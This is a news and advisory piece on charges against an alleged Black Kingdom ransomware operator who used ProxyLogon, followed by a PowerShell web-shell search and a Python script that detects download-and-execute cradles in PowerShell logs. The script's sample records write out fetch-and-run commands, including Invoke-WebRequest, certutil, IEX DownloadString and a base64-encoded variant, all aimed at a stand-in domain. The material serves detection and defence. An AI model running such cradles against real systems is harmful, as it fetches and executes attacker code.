The U.S. Department of Justice unsealed charges against Yemeni national Rami Khaled Ahmed (36) for deploying Black Kingdom ransomware via ProxyLogon exploits (CVE-2021-26855) against 1,500+ systems, including U.S. healthcare, education, and hospitality sectors. The attacks, occurring between March 2021 and June 2023, leveraged post-exploitation PowerShell commands to deploy web shells and download ransomware payloads.
Technical analysis
- Initial access: exploited unpatched Exchange servers to drop web shells (e.g., `.aspx` files).
- Payload delivery: used commands like `Invoke-WebRequest` or `certutil` to fetch ransomware binaries from attacker-controlled domains.
- Ransom mechanism: encrypted files or exfiltrated data, demanding $10,000 in Bitcoin with payment confirmation sent to `blackkingdom@[redacted].com`. Black Kingdom's code lacked sophistication, relying on hardcoded paths and minimal obfuscation.
Operational context
- Black Kingdom was previously linked to exploitation of Pulse Secure VPN (CVE-2019-11510) before its operators shifted to ProxyLogon.
- FBI and New Zealand Police traced Bitcoin transactions to Ahmed’s wallets, revealing ties to co-conspirators.
Broader trends
- Declining ransom payments: 64% of 2024 victims refused to pay, per Verizon's 2025 Data Breach Investigations Report, and the median payment dropped to $115,000.
- Law enforcement impact: recent takedowns (e.g., LockBit, ALPHV/BlackCat) fragmented ransomware ecosystems, pushing affiliates toward independent operations.
Mitigation Steps
```powershell
# Check for ProxyLogon-related web shells. -SimpleMatch is required: as a regex,
# "eval(Request" has an unbalanced "(" and Select-String throws instead of searching.
Get-ChildItem -Path "C:\inetpub\wwwroot\aspnet_client\" -Filter *.aspx -Recurse -ErrorAction SilentlyContinue |
    Select-String -Pattern "eval(Request" -SimpleMatch | Select-Object Path, LineNumber
```
Patch Exchange servers immediately and audit PowerShell execution logs for anomalous `DownloadString` or `Invoke-Expression` patterns. Note that `aspnet_client` was not the only drop location reported for ProxyLogon web shells; Microsoft's guidance also listed the Exchange `FrontEnd\HttpProxy\owa\auth\` directory, so extend the search there as well.
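As an added example (not the article's own code, nor anything from the indictment), here is a Python triage script for that log audit and for the payload-delivery commands listed above: it runs the `Invoke-WebRequest` / `certutil` / `DownloadString` / `Invoke-Expression` checks over constructed records shaped like the `ScriptBlockText` field of PowerShell Event ID 4104, the kind of export a SIEM holds. It goes slightly beyond the article's list: the `iwr` and `iex` aliases are included, the `DownloadFile`/`DownloadData` siblings of `DownloadString` are covered, and a `-EncodedCommand` argument is base64/UTF-16LE decoded and scanned too, since operators commonly wrap cradles that way. The sample records, the indicator names and the `example.invalid` domain are all constructed for the example and are not from the case.

```python
from __future__ import annotations

import base64
import binascii
import re

# Indicator patterns for the download-and-execute cradles named in the article.
# Aliases (iwr, iex) are included: script block logging records what the operator
# typed, aliases and all. DownloadFile/DownloadData are WebClient siblings of
# DownloadString that serve the same purpose. Names are this example's own labels.
CRADLE_PATTERNS = [
    ("invoke-webrequest", re.compile(r"\b(?:invoke-webrequest|iwr)\b", re.I)),
    ("certutil-download", re.compile(r"\bcertutil(?:\.exe)?\b[^\n]*-urlcache", re.I)),
    ("downloadstring", re.compile(r"\.download(?:string|file|data)\s*\(", re.I)),
    ("invoke-expression", re.compile(r"\b(?:invoke-expression|iex)\b", re.I)),
]

# powershell.exe accepts any unambiguous prefix of -EncodedCommand; -e, -ec, -en
# and -enc are the forms usually seen in command lines. The value is base64 over
# UTF-16LE text.
ENCODED_ARG = re.compile(r"-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(text: str) -> str | None:
    """Return the decoded script if text carries an -EncodedCommand argument.

    Anything that does not decode cleanly (wrong alphabet, bad padding, not
    UTF-16LE) is treated as "no encoded command" rather than raising, so a
    stray token cannot abort a bulk triage run.
    """
    match = ENCODED_ARG.search(text)
    if match is None:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def classify_script_block(text: str) -> list[str]:
    """Return the names of the cradle indicators present in one record.

    Both the raw text and, when present, the decoded -EncodedCommand payload are
    scanned, so a cradle hidden behind base64 is still reported.
    """
    candidates = [text]
    decoded = decode_encoded_command(text)
    if decoded is not None:
        candidates.append(decoded)
    return [name for name, pat in CRADLE_PATTERNS if any(pat.search(c) for c in candidates)]


def triage(records: list[str]) -> list[tuple[int, list[str]]]:
    """Return (record index, indicators) for every record that fired at least one."""
    results = []
    for index, record in enumerate(records):
        hits = classify_script_block(record)
        if hits:
            results.append((index, hits))
    return results


# Constructed sample records shaped like the ScriptBlockText field of
# Event ID 4104 plus one process command line. Not real telemetry from the
# case; example.invalid is a reserved, non-resolving domain.
_ENCODED_CRADLE = base64.b64encode(
    "iex (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')".encode("utf-16-le")
).decode("ascii")

SAMPLE_RECORDS = [
    "Get-Service | Where-Object Status -eq 'Running'",
    "Invoke-WebRequest -Uri http://example.invalid/k.exe -OutFile C:\\Windows\\Temp\\k.exe",
    "certutil.exe -urlcache -split -f http://example.invalid/k.exe C:\\Users\\Public\\k.exe",
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')",
    "powershell.exe -nop -w hidden -enc " + _ENCODED_CRADLE,
    "Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope CurrentUser",
]

if __name__ == "__main__":
    for index, hits in triage(SAMPLE_RECORDS):
        print(f"record {index}: {', '.join(hits)}")
```

Records 0 and 5 (routine administration, including the `-eq` and `-ExecutionPolicy` tokens that a sloppier `-e` match would trip on) produce no findings; records 1 through 4 each report the cradle they carry, with the encoded record 4 classified identically to its plaintext twin in record 3. On a real export, feed the `ScriptBlockText` values (and 4688 command lines) in as `records` and review hits alongside the `eval(Request` file search above.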
Ahmed faces up to 15 years if convicted, highlighting intensified global efforts to disrupt ransomware economies.